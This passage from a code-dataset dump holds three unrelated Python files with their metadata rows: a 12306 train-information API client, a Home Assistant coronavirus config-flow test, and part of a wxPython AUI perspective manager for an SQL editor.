return date.fromisoformat('{0[:4]}-{0[4:6]}-{0[6:8]}'.format(s))
def train_list_by_station_name(
self,
from_station_name: str,
to_station_name: str,
query_date: Optional[date]=None,
) -> List[Dict[str, Any]]:
if not query_date:
query_date = date.today()
return self.get(
'stoptime/queryByStationName',
params=dict(
trainDate=query_date.isoformat(),
fromStationName=from_station_name,
toStationName=to_station_name))
def run_rule_by_train_no(
self,
train_no: str,
start_date: Optional[date]=None,
end_date: Optional[date]=None,
) -> Dict[date, bool]:
if not start_date:
start_date = date.today()
if not end_date:
end_date = date.fromordinal(start_date.toordinal() + 1)
resp = self.get(
'trainDetailInfo/queryTrainRunRuleByTrainNoAndDateRange',
params=dict(
start=self.yyyymmdd_format(start_date),
end=self.yyyymmdd_format(end_date),
trainNo=train_no))
return {
self.from_yyyymmdd_format(k): resp[k] == '1'
for k in sorted(resp)
}
def stop_time_by_train_code(
self,
train_code: str,
query_date: Optional[date]=None,
big_screen: Optional[bool]=False,
) -> List[Dict[str, Any]]:
if not query_date:
query_date = date.today()
return self.get(
'stoptime/queryByTrainCode',
params=dict(
getBigScreen=['NO', 'YES'][big_screen],
trainDate=self.yyyymmdd_format(query_date),
trainCode=train_code))
def pre_seq_train_by_train_code(
self,
train_code: str,
query_date: Optional[date]=None,
) -> List[Dict[str, Any]]:
if not query_date:
query_date = date.today()
return self.get(
'preSequenceTrain/getPreSequenceTrainInfo',
params=dict(
trainDate=self.yyyymmdd_format(query_date),
trainCode=train_code))
def train_set_type_by_train_code(self, train_code: str) -> Dict[str, Any]:
return self.get(
'trainDetailInfo/getTrainsetTypeByTrainCode',
params=dict(trainCode=train_code))
def train_compile_list_by_train_no(self, train_no: str) -> List[Dict]:
return self.get(
'trainDetailInfo/queryTrainCompileListByTrainNo',
params=dict(trainNo=train_no))
def train_equipment_by_train_no(self, train_no: str) -> List[Dict]:
return self.get(
'trainDetailInfo/queryTrainEquipmentByTrainNo',
params=dict(trainNo=train_no))
@staticmethod
def denormalize_multiple_train_code(train_codes: Iterable[str]) -> str:
train_numbers = []
for i, t in enumerate(train_codes):
if i == 0:
prefix = t
last_train_number = t
train_numbers.append(t)
elif t != last_train_number:
prefix = commonprefix([prefix, t])
last_train_number = t
train_numbers.append(t)
return prefix + '/'.join(t[len(prefix):] for t in train_numbers)
def info_by_train_code(self, train_code: str) -> Optional[Dict[str, Any]]:
stations = self.stop_time_by_train_code(train_code)
if not stations:
return
start_station, *_, end_station = stations
train_code = self.denormalize_multiple_train_code(
s['stationTrainCode'] for s in stations)
train_no = start_station['trainNo']
distance = end_station['distance']
time_span = self.explain_time_span(end_station['timeSpan'])
return AttrDict(locals())
@staticmethod
def explain_time_span(milliseconds: int) -> Tuple[int, int]:
return divmod(milliseconds // 1000 // 60, 60)
@classmethod
def explain_stop_time(cls, stations: List[Dict[str, Any]]) -> str:
for s in stations:
s['hours'], s['minutes'] = cls.explain_time_span(s['timeSpan'])
return '\n'.join(chain(
['\n'],
['车次 里程 用时 编号 到站 发车 电报码 站名', '-' * 21],
(
'{stationTrainCode:5} {distance:4} {hours:02}:{minutes:02}'
' {stationNo} {arriveTime} {startTime} '
'-{stationTelecode} {stationName}'.format_map(s)
for s in stations),
))
@staticmethod
def explain_pre_seq_train(pre_seq_train: List[Dict[str, Any]]) -> str:
return '\n'.join(chain(
['\n'],
['车次 里程 发时 到时 发站 到站', '-' * 18],
(
'{trainCode:5} {distance:>4} '
'{startTime} {endTime} {startStation} {endStation}'.format_map(s)
for s in pre_seq_train),
))
@staticmethod
def explain_train_equipment(train_equipment: List[Dict[str, Any]]) -> str:
depot = '{bureaName}局({deploydepotName}){depotName} '.format_map(
train_equipment[0])
vehicles = ' '.join(e['trainsetName'] for e in train_equipment)
if len(train_equipment) > 1:
vehicles += ' 重联'
return depot + vehicles
@staticmethod
def explain_train_compile_list(train_compile_list: List[Dict]) -> str:
for c in train_compile_list:
comment = c.get('commentCode')
c['comment'] = ' ' + comment + ' ' + COMMENT_MAPPING.get(comment, '')
return '\n'.join(chain(
['\n'],
['编号 车种 定员 附注', '-' * 10],
('{coachNo:4} {coachType:4.4} {limit1:3} {comment}'.
format_map(c) for c in sorted(
train_compile_list, key=itemgetter('coachNo'))),
))
def repl_handler(self, train_code: str) -> str:
try:
info = self.info_by_train_code(train_code)
except APIError as e:
print(e)
return '> '
print(
'{train_code}({start_station[stationName]}-'
'{end_station[stationName]},{distance} km,'
'{time_span[0]:02}:{time_span[1]:02})'.format_map(info))
train_equipment = self.train_equipment_by_train_no(info.train_no)
if train_equipment:
print(self.explain_train_equipment(train_equipment))
else:
train_set_type = self.train_set_type_by_train_code(info.train_no)
if train_set_type:
print('{trainsetType}{trainsetTypeName}'.format_map(
train_set_type))
train_compile_list = self.train_compile_list_by_train_no(info.train_no)
if train_compile_list:
print(self.explain_train_compile_list(train_compile_list))
print(self.explain_stop_time(info.stations))
pre_seq_train = self.pre_seq_train_by_train_code(train_code)
if pre_seq_train:
print(self.explain_pre_seq_train(pre_seq_train))
return '> '
class APIError(ValueError):
pass
if __name__ == '__main__':
repl(Wifi12306().repl_handler)
| 33.443137 | 198 | 0.577744 | 992 | 8,528 | 4.72379 | 0.257056 | 0.044174 | 0.034144 | 0.017926 | 0.307298 | 0.245625 | 0.202732 | 0.148314 | 0.13679 | 0.13679 | 0 | 0.015521 | 0.297373 | 8,528 | 254 | 199 | 33.574803 | 0.766522 | 0.007505 | 0 | 0.256881 | 0 | 0.004587 | 0.142723 | 0.064425 | 0 | 0 | 0.001176 | 0 | 0 | 1 | 0.087156 | false | 0.004587 | 0.03211 | 0.03211 | 0.224771 | 0.03211 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfc69200893675851efff0c9ed38ba8da908af17 | 1,648 | py | Python | tests/components/coronavirus/test_config_flow.py | basicpail/core | 5cc54618c5af3f75c08314bf2375cc7ac40d2b7e | [
"Apache-2.0"
] | 11 | 2018-02-16T15:35:47.000Z | 2020-01-14T15:20:00.000Z | tests/components/coronavirus/test_config_flow.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 79 | 2020-07-23T07:13:37.000Z | 2022-03-22T06:02:37.000Z | tests/components/coronavirus/test_config_flow.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 11 | 2020-12-16T13:48:14.000Z | 2022-02-01T00:28:05.000Z | """Test the Coronavirus config flow."""
from unittest.mock import MagicMock, patch
from aiohttp import ClientError
from homeassistant import config_entries, setup
from homeassistant.components.coronavirus.const import DOMAIN, OPTION_WORLDWIDE
from homeassistant.core import HomeAssistant
async def test_form(hass: HomeAssistant) -> None:
"""Test we get the form."""
await setup.async_setup_component(hass, "persistent_notification", {})
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"country": OPTION_WORLDWIDE},
)
assert result2["type"] == "create_entry"
assert result2["title"] == "Worldwide"
assert result2["result"].unique_id == OPTION_WORLDWIDE
assert result2["data"] == {
"country": OPTION_WORLDWIDE,
}
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 4
@patch(
"coronavirus.get_cases",
side_effect=ClientError,
)
async def test_abort_on_connection_error(
mock_get_cases: MagicMock, hass: HomeAssistant
) -> None:
"""Test we abort on connection error."""
await setup.async_setup_component(hass, "persistent_notification", {})
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert "type" in result
assert result["type"] == "abort"
assert "reason" in result
assert result["reason"] == "cannot_connect"
| 32.313725 | 79 | 0.703277 | 193 | 1,648 | 5.80829 | 0.352332 | 0.069581 | 0.040143 | 0.058876 | 0.332739 | 0.284567 | 0.256913 | 0.256913 | 0.256913 | 0.256913 | 0 | 0.004425 | 0.177184 | 1,648 | 50 | 80 | 32.96 | 0.822271 | 0.020024 | 0 | 0.153846 | 0 | 0 | 0.125162 | 0.04345 | 0 | 0 | 0 | 0 | 0.282051 | 1 | 0 | false | 0 | 0.128205 | 0 | 0.128205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfc8836265bf50d2912b69d0feaa958739783ce7 | 64,150 | py | Python | src/view/perspective.py | struts2spring/sql-editor | 082868dd92cbd8f0f6715f734f9ebe64032cbe4a | [
"MIT"
] | 9 | 2018-10-15T04:57:37.000Z | 2021-12-07T07:39:35.000Z | src/view/perspective.py | struts2spring/sql-editor | 082868dd92cbd8f0f6715f734f9ebe64032cbe4a | [
"MIT"
] | 13 | 2018-10-19T11:52:44.000Z | 2021-09-08T00:39:30.000Z | src/view/perspective.py | struts2spring/sql-editor | 082868dd92cbd8f0f6715f734f9ebe64032cbe4a | [
"MIT"
] | 3 | 2018-10-25T11:08:04.000Z | 2021-02-23T08:28:31.000Z | import logging.config
import wx
from src.sqlite_executer.ConnectExecuteSqlite import SQLExecuter
from src.view.AutoCompleteTextCtrl import TextCtrlAutoComplete
# from src.view.TreePanel import CreatingTreePanel
from src.view.constants import *
from wx.lib.agw.aui.aui_constants import actionDragFloatingPane, AUI_DOCK_NONE, \
ITEM_NORMAL, ITEM_CHECK, ITEM_RADIO, ID_RESTORE_FRAME, \
AUI_BUTTON_STATE_NORMAL, AUI_BUTTON_STATE_PRESSED
from src.view.views.file.explorer.FileBrowserPanel import FileBrowser
from src.view.views.console.SqlOutputPanel import SqlConsoleOutputPanel
from src.view.views.console.worksheet.WorksheetPanel import CreateWorksheetTabPanel, \
CreatingWorksheetWithToolbarPanel
from src.view.views.sql.history.HistoryListPanel import HistoryGrid
from src.view.views.console.worksheet.WelcomePage import WelcomePanel
from wx.lib.agw.aui.framemanager import NonePaneInfo, wxEVT_AUI_PANE_MIN_RESTORE, \
AuiManagerEvent
from src.view.util.FileOperationsUtil import FileOperations
from wx.lib.platebtn import PlateButton, PB_STYLE_DEFAULT, PB_STYLE_DROPARROW
# from wx.lib.pubsub import setupkwargs
# regular pubsub import
from pubsub import pub
from wx.lib.agw.aui.auibar import AuiToolBarEvent, \
wxEVT_COMMAND_AUITOOLBAR_BEGIN_DRAG, wxEVT_COMMAND_AUITOOLBAR_MIDDLE_CLICK, \
wxEVT_COMMAND_AUITOOLBAR_RIGHT_CLICK
from src.view.views.python.explorer.PythonExplorer import PythonExplorerPanel
from wx import py
from src.view.views.java.explorer.JavaExplorer import CreatingJavaExplorerPanel
from src.view.views.project.explorer.ProjectExplorer import CreatingProjectExplorerPanel
from src.view.views.database.explorer.DataSourceExplorer import DataSourcePanel
from wx.lib.agw.aui import auibook
from src.view.other.new.NewFlow import NewFlowFrame
logging.config.dictConfig(LOG_SETTINGS)
logger = logging.getLogger('extensive')
try:
from agw import aui
from agw.aui import aui_switcherdialog as ASD
except ImportError: # if it's not there locally, try the wxPython lib.
import wx.lib.agw.aui as aui
from wx.lib.agw.aui import aui_switcherdialog as ASD
############################################################
class EclipseAuiToolbar(aui.AuiToolBar):
def __init__(self, parent):
super().__init__(parent, -1, agwStyle=aui.AUI_TB_DEFAULT_STYLE | wx.NO_BORDER)
pub.subscribe(self.__onObjectAdded, 'perspectiveClicked')
pub.subscribe(self.__onUpdatePageText, 'onUpdatePageText')
def __onObjectAdded(self, data, extra1, extra2=None):
# no longer need to access data through message.data.
print('Object', repr(data), 'is added')
print(extra1)
if extra2:
print(extra2)
def __onUpdatePageText(self, filePath, extra1, extra2=None):
# no longer need to access data through message.data.
logger.info(f'EclipseAuiToolbar.onUpdatePageText {filePath}')
print(extra1)
if extra2:
print(extra2)
def getToolBarItemById(self, id=None):
item = None
for _item in self._items:
if _item.id == id:
item = _item
break
return item
def OnLeaveWindow(self, event):
"""
Handles the ``wx.EVT_LEAVE_WINDOW`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
self.RefreshOverflowState()
# self.SetHoverItem(None)
# self.SetPressedItem(None)
#
# self._tip_item = None
self.StopPreviewTimer()
def SetPressedItem(self, pitem):
"""
Sets a toolbar item to be currently in a "pressed" state.
:param `pitem`: an instance of :class:`AuiToolBarItem`.
"""
if pitem and pitem.label != 'Open Perspective':
former_item = None
for item in self._items:
if item.state & aui.AUI_BUTTON_STATE_PRESSED:
former_item = item
item.state &= ~aui.AUI_BUTTON_STATE_PRESSED
pitem.state &= ~aui.AUI_BUTTON_STATE_HOVER
pitem.state |= aui.AUI_BUTTON_STATE_PRESSED
if former_item != pitem:
self.Refresh(False)
self.Update()
def OnLeftUp(self, event):
"""
Handles the ``wx.EVT_LEFT_UP`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
self.SetPressedItem(None)
hit_item = self.FindToolForPosition(*event.GetPosition())
if hit_item and not hit_item.state & aui.AUI_BUTTON_STATE_DISABLED:
self.SetHoverItem(hit_item)
if self._dragging:
# reset drag and drop member variables
self._dragging = False
self._action_pos = wx.Point(-1, -1)
self._action_item = None
else:
if self._action_item and hit_item == self._action_item:
self.SetToolTip("")
if hit_item.kind in [ITEM_CHECK, ITEM_RADIO]:
toggle = not (self._action_item.state & aui.AUI_BUTTON_STATE_CHECKED)
self.ToggleTool(self._action_item.id, toggle)
# repaint immediately
self.Refresh(False)
self.Update()
e = wx.CommandEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self._action_item.id)
e.SetEventObject(self)
e.SetInt(toggle)
self._action_pos = wx.Point(-1, -1)
self._action_item = None
self.ProcessEvent(e)
self.DoIdleUpdate()
else:
if self._action_item.id == ID_RESTORE_FRAME:
# find aui manager
manager = self.GetAuiManager()
if not manager:
return
if self._action_item.target:
pane = manager.GetPane(self._action_item.target)
else:
pane = manager.GetPane(self)
# from . import framemanager
e = AuiManagerEvent(wxEVT_AUI_PANE_MIN_RESTORE)
e.SetManager(manager)
e.SetPane(pane)
manager.ProcessEvent(e)
self.DoIdleUpdate()
else:
e = wx.CommandEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self._action_item.id)
e.SetEventObject(self)
self.ProcessEvent(e)
self.DoIdleUpdate()
# reset drag and drop member variables
self._dragging = False
self._action_pos = wx.Point(-1, -1)
self._action_item = None
def OnRightDown(self, event):
"""
Handles the ``wx.EVT_RIGHT_DOWN`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
cli_rect = wx.Rect(wx.Point(0, 0), self.GetClientSize())
if self._gripper_sizer_item:
gripper_rect = self._gripper_sizer_item.GetRect()
if gripper_rect.Contains(event.GetPosition()):
return
if self.GetOverflowVisible():
dropdown_size = self._art.GetElementSize(aui.AUI_TBART_OVERFLOW_SIZE)
if dropdown_size > 0 and event.GetX() > cli_rect.width - dropdown_size and \
event.GetY() >= 0 and event.GetY() < cli_rect.height and self._art:
return
self._action_pos = wx.Point(*event.GetPosition())
self._action_item = self.FindToolForPosition(*event.GetPosition())
if self._action_item:
if self._action_item.state & aui.AUI_BUTTON_STATE_DISABLED:
self._action_pos = wx.Point(-1, -1)
self._action_item = None
return
def OnRightUp(self, event):
"""
Handles the ``wx.EVT_RIGHT_UP`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
hit_item = self.FindToolForPosition(*event.GetPosition())
if self._action_item and hit_item == self._action_item:
e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_RIGHT_CLICK, self._action_item.id)
e.SetEventObject(self)
e.SetToolId(self._action_item.id)
e.SetClickPoint(self._action_pos)
self.ProcessEvent(e)
self.DoIdleUpdate()
else:
# right-clicked on the invalid area of the toolbar
e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_RIGHT_CLICK, -1)
e.SetEventObject(self)
e.SetToolId(-1)
e.SetClickPoint(self._action_pos)
self.ProcessEvent(e)
self.DoIdleUpdate()
# reset member variables
self._action_pos = wx.Point(-1, -1)
self._action_item = None
def OnMiddleDown(self, event):
"""
Handles the ``wx.EVT_MIDDLE_DOWN`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
cli_rect = wx.Rect(wx.Point(0, 0), self.GetClientSize())
if self._gripper_sizer_item:
gripper_rect = self._gripper_sizer_item.GetRect()
if gripper_rect.Contains(event.GetPosition()):
return
if self.GetOverflowVisible():
dropdown_size = self._art.GetElementSize(aui.AUI_TBART_OVERFLOW_SIZE)
if dropdown_size > 0 and event.GetX() > cli_rect.width - dropdown_size and \
event.GetY() >= 0 and event.GetY() < cli_rect.height and self._art:
return
self._action_pos = wx.Point(*event.GetPosition())
self._action_item = self.FindToolForPosition(*event.GetPosition())
if self._action_item:
if self._action_item.state & aui.AUI_BUTTON_STATE_DISABLED:
self._action_pos = wx.Point(-1, -1)
self._action_item = None
return
def OnMiddleUp(self, event):
"""
Handles the ``wx.EVT_MIDDLE_UP`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
hit_item = self.FindToolForPosition(*event.GetPosition())
if self._action_item and hit_item == self._action_item:
if hit_item.kind == ITEM_NORMAL:
e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_MIDDLE_CLICK, self._action_item.id)
e.SetEventObject(self)
e.SetToolId(self._action_item.id)
e.SetClickPoint(self._action_pos)
self.ProcessEvent(e)
self.DoIdleUpdate()
# reset member variables
self._action_pos = wx.Point(-1, -1)
self._action_item = None
def OnMotion(self, event):
"""
Handles the ``wx.EVT_MOTION`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
# start a drag event
if not self._dragging and self._action_item != None and self._action_pos != wx.Point(-1, -1) and \
abs(event.GetX() - self._action_pos.x) + abs(event.GetY() - self._action_pos.y) > 5:
self.SetToolTip("")
self._dragging = True
e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_BEGIN_DRAG, self.GetId())
e.SetEventObject(self)
e.SetToolId(self._action_item.id)
self.ProcessEvent(e)
self.DoIdleUpdate()
return
hit_item = self.FindToolForPosition(*event.GetPosition())
if hit_item:
if not hit_item.state & aui.AUI_BUTTON_STATE_DISABLED:
self.SetHoverItem(hit_item)
else:
self.SetHoverItem(None)
else:
# no hit item, remove any hit item
self.SetHoverItem(hit_item)
# figure out tooltips
packing_hit_item = self.FindToolForPositionWithPacking(*event.GetPosition())
if packing_hit_item:
if packing_hit_item != self._tip_item:
self._tip_item = packing_hit_item
if packing_hit_item.short_help != "":
self.StartPreviewTimer()
self.SetToolTip(packing_hit_item.short_help)
else:
self.SetToolTip("")
self.StopPreviewTimer()
else:
self.SetToolTip("")
self._tip_item = None
self.StopPreviewTimer()
# if we've pressed down an item and we're hovering
# over it, make sure it's state is set to pressed
if self._action_item:
if self._action_item == hit_item:
self.SetPressedItem(self._action_item)
else:
self.SetPressedItem(None)
# figure out the dropdown button state (are we hovering or pressing it?)
self.RefreshOverflowState()
self.Realize()
class MyAuiManager(aui.AuiManager):
def __init__(self, managed_window=None, agwFlags=None):
super(MyAuiManager, self).__init__(managed_window=managed_window, agwFlags=agwFlags)
def addTabByWindow(self, window=None , icon=None, imageName="script.png", name=None, captionName=None, tabDirection=5):
'''
This method always create a new tab for the window.
tabDirection=2 is the right
tabDirection=3 is the bottom
tabDirection=4 is the left
tabDirection=5 is the center
'''
self.SetAutoNotebookStyle(aui.AUI_NB_DEFAULT_STYLE | wx.BORDER_NONE)
if name == None:
name = captionName
isPaneAdded = False
for pane in self.GetAllPanes():
# logger.debug(pane.dock_direction_get())
if pane.dock_direction_get() == tabDirection: # adding to center tab
if not icon:
icon = FileOperations().getImageBitmap(imageName=imageName)
auiPanInfo = aui.AuiPaneInfo().Icon(icon).\
Name(name).Caption(captionName).LeftDockable(True).Direction(wx.TOP).\
Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).MinSize(200, -1)\
.BestSize(200, -1).CaptionVisible(visible=True)
targetTab = pane
if not pane.HasNotebook():
self.CreateNotebookBase(self._panes, pane)
# targetTab.NotebookPage(pane.notebook_id)
self.AddPane(window, auiPanInfo, target=targetTab)
isPaneAdded = True
# self._mgr._notebooks
# self._mgr.ActivatePane(targetTab.window)
else:
self.AddPane(window, auiPanInfo, target=targetTab)
isPaneAdded = True
break
if not isPaneAdded:
auiPanInfo = aui.AuiPaneInfo().Icon(FileOperations().getImageBitmap(imageName=imageName)).\
Name(name).Caption(captionName).LeftDockable(True).Dockable(True).Movable(True).MinSize(200, -1).BestSize(200, -1).CaptionVisible(visible=True).Direction(wx.TOP).\
Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).CaptionVisible(visible=True)
auiPanInfo.dock_direction = tabDirection
self.AddPane(window, auiPanInfo)
self.Update()
def OnTabBeginDrag(self, event):
"""
Handles the ``EVT_AUINOTEBOOK_BEGIN_DRAG`` event.
:param `event`: a :class:`~wx.lib.agw.aui.auibook.AuiNotebookEvent` event to be processed.
"""
if self._masterManager:
self._masterManager.OnTabBeginDrag(event)
else:
paneInfo = self.PaneFromTabEvent(event)
if paneInfo.IsOk():
# It's one of ours!
self._action = actionDragFloatingPane
mouse = wx.GetMousePosition()
# set initial float position - may have to think about this
# offset a bit more later ...
self._action_offset = wx.Point(20, 10)
self._toolbar_action_offset = wx.Point(20, 10)
paneInfo.floating_pos = mouse - self._action_offset
paneInfo.dock_pos = AUI_DOCK_NONE
paneInfo.notebook_id = -1
tab = event.GetEventObject()
try:
if tab.HasCapture():
tab.ReleaseMouse()
except:
pass
# float the window
if paneInfo.IsMaximized():
self.RestorePane(paneInfo)
paneInfo.Float()
# The call to Update may result in
# the notebook that generated this
# event being deleted, so we have
# to do the call asynchronously.
wx.CallAfter(self.Update)
self._action_window = paneInfo.window
self._frame.CaptureMouse()
event.SetDispatched(True)
else:
# not our window
event.Skip()
def GetPaneByHavingName(self, name):
"""
This version of :meth:`GetPane` looks up a pane based on a 'pane name'.
:param string `name`: the pane name.
:see: :meth:`GetPane`
"""
for p in self._panes:
if p.name in name:
return p
return NonePaneInfo
def hidePane(self, window):
self.ShowPane(window, show=False)
def OnSize(self, event):
super().OnSize(event)
(x, y) = self._frame.GetClientSize()
perspectiveToolbar = self.GetPane("perspectiveToolbar")
perspectiveToolbar.dock_pos = x - ((len(perspectiveToolbar.window._items) - 2) * 32) + 5
self.Update()
# self.DoDropToolbar(self._docks, self._panes, perspectiveToolbar, point, wx.Point(0,0))
class PerspectiveManager(object):
"""Creates a perspective manager for the given aui managed window.
It supports saving and loading of on disk perspectives as created by
calling SavePerspective from the AuiManager. Mixin class for a wx.Frame.
"""
def __init__(self, base=None):
"""Initializes the perspective manager. The auimgr parameter is
a reference to the windows AuiManager instance, base is the base
path to where perspectives should be loaded from and saved to.
@param base: path to configuration cache
"""
super(PerspectiveManager, self).__init__()
self.toolbarItems = {}
self.createAuiManager()
pub.subscribe(self.__onObjectAdded, 'perspectiveClicked')
pub.subscribe(self.__onUpdatePageText, 'onUpdatePageText')
self.accel_tbl = wx.AcceleratorTable([
(wx.ACCEL_CTRL, ord('N'), ID_NEW),
(wx.ACCEL_CTRL, ord('Y'), ID_REDO),
(wx.ACCEL_CTRL, ord('Z'), ID_UNDO),
(wx.ACCEL_CTRL, ord('C'), ID_COPY),
(wx.ACCEL_CTRL, ord('V'), ID_PASTE),
(wx.ACCEL_CTRL, ord('X'), ID_CUT),
(wx.ACCEL_CTRL | wx.ACCEL_ALT, wx.WXK_DOWN, ID_DUPLICATE_LINE),
(wx.ACCEL_CTRL, ord('S'), ID_SAVE),
(wx.ACCEL_CTRL, ord('H'), ID_SEARCH_FILE),
(wx.ACCEL_CTRL | wx.ACCEL_SHIFT, ord('F'), ID_FORMAT_FILE),
(wx.ACCEL_CTRL | wx.ACCEL_SHIFT , ord('R'), ID_RESOURCE),
(wx.ACCEL_CTRL | wx.ACCEL_SHIFT , ord('T'), ID_OPEN_TYPE),
# (wx.ACCEL_CTRL, ord('V'), wx.ID_PASTE),
# (wx.ACCEL_ALT, ord('X'), wx.ID_PASTE),
# (wx.ACCEL_SHIFT | wx.ACCEL_ALT, ord('Y'), wx.ID_PASTE)
])
self.SetAcceleratorTable(self.accel_tbl)
def __onUpdatePageText(self, filePath, extra1, extra2=None):
# no longer need to access data through message.data.
logger.info(f'PerspectiveManager.__onUpdatePageText: {filePath}')
viewToolbar = self._mgr.GetPane("viewToolbar")
print(extra1)
toolSave = viewToolbar.window.FindTool(ID_SAVE)
toolSaveAll = viewToolbar.window.FindTool(ID_SAVE_ALL)
toolSaveAll.state = aui.AUI_BUTTON_STATE_NORMAL
toolSave.state = aui.AUI_BUTTON_STATE_NORMAL
logger.info(toolSave.state)
self.updateTitle(title=filePath)
self._mgr.Update()
if extra2:
print(extra2)
def __onObjectAdded(self, data, extra1, extra2=None):
# no longer need to access data through message.data.
print('PerspectiveManager', repr(data), 'is added')
print(extra1)
if extra2:
print(extra2)
def createAuiManager(self):
logger.debug('createAuiManager')
# tell FrameManager to manage this frame
self._mgr = MyAuiManager()
self._mgr.SetManagedWindow(self)
# set up default notebook style
self._notebook_style = aui.AUI_NB_DEFAULT_STYLE | wx.BORDER_NONE
self._notebook_theme = 1
# min size for the frame itself isn't completely done.
# see the end up AuiManager.Update() for the test
# code. For now, just hard code a frame minimum size
self.SetMinSize(wx.Size(100, 100))
self._perspectives = []
# add a bunch of panes
# self._mgr.AddPane(self.CreateSizeReportCtrl(), wx.aui.AuiPaneInfo().Name("test1").Caption("Pane Caption").Top().CloseButton(True).MaximizeButton(True))
# add the toolbars to the manager
# topToolBar = wx.BoxSizer(wx.HORIZONTAL)
# topToolBar.Add(self.constructToolBar(),1,wx.ALIGN_LEFT,4) # note the 2nd param 'proportion' is 1
# #topToolBar.AddStretchSpacer()
# topToolBar.Add(self.constructToolBar(),0,wx.ALIGN_RIGHT,4)
self._mgr.AddPane(self.constructViewToolBar(), aui.AuiPaneInfo().
Name("viewToolbar").Caption("View Toolbar").
ToolbarPane().Top().Row(1).Position(1).CloseButton(True).
LeftDockable(False).RightDockable(False).Gripper(True))
self._mgr.AddPane(self.constructPerspectiveToolBar(), aui.AuiPaneInfo().
Name("perspectiveToolbar").Caption("Perspective Toolbar").
ToolbarPane().Top().Row(1).Position(1).CloseButton(True).
LeftDockable(False).RightDockable(False).Gripper(True), self.definePoint())
# self._mgr.AddPane(self.creatingFileExplorer(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="file_explorer.png")).BestSize(500, -1).
# Name("fileExplorer").Caption("File Explorer").Dockable(True).Movable(True).MinSize(500, -1).Resizable(True).
# Left().Layer(1).Position(2).CloseButton(True).MaximizeButton(True).MinimizeButton(True))
# self._mgr.AddPane(self.creatingTreeCtrl(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="folder_database.png")).BestSize(500, -1).
# Name("databaseNaviagor").Caption("Database Navigator").Dockable(True).Movable(True).MinSize(500, -1).
# Left().Layer(1).Position(1).CloseButton(True).MaximizeButton(True).MinimizeButton(True), target=self._mgr.GetPane("fileExplorer"))
self._mgr.AddPane(WelcomePanel(self), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="welcome16.png")).BestSize(500, -1).
Name("onWelcome").Caption("Welcome").Dockable(True).Movable(True).MinSize(500, -1).CaptionVisible(visible=True).Direction(wx.TOP).
Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True))
# self._mgr.AddPane(wx.Panel(self), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="variable_view.png")).BestSize(500, -1).
# Name("variableView").Caption("Variable").Dockable(True).Movable(True).MinSize(500, -1).CaptionVisible(visible=True).Direction(wx.TOP).
# Right().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True))
# self._mgr.AddPane(self.constructCenterPane(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="script.png")).
# Name("centerPane").Caption("Center Pane").LeftDockable(True).Direction(wx.TOP).
# Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).CaptionVisible(visible=True), target=self._mgr.GetPane("onWelcome"))
# self._mgr.AddPane(self.getWorksheet(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="script.png")).
# Name("Worksheet-0").Caption("Worksheet-0").LeftDockable(True).Direction(wx.TOP).
# Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).CaptionVisible(visible=True), target=self._mgr.GetPane("onWelcome"))
# self._mgr.AddPane(self.constructSchemaViewerPane(), aui.AuiPaneInfo().Icon(wx.Bitmap(os.path.join(path, "script.png"))).
# Name("schemaViewer").Caption("Schema Viewer").LeftDockable(True).
# Center().CloseButton(True).MaximizeButton(True).MinimizeButton(True))
# self._mgr.AddPane(self.constructSchemaViewerPane(), aui.AuiPaneInfo().
# Name("test9").Caption("Min Size 200x100").
# BestSize(wx.Size(200, 100)).MinSize(wx.Size(200, 100)).
# Bottom().Layer(1).CloseButton(True).MaximizeButton(True))
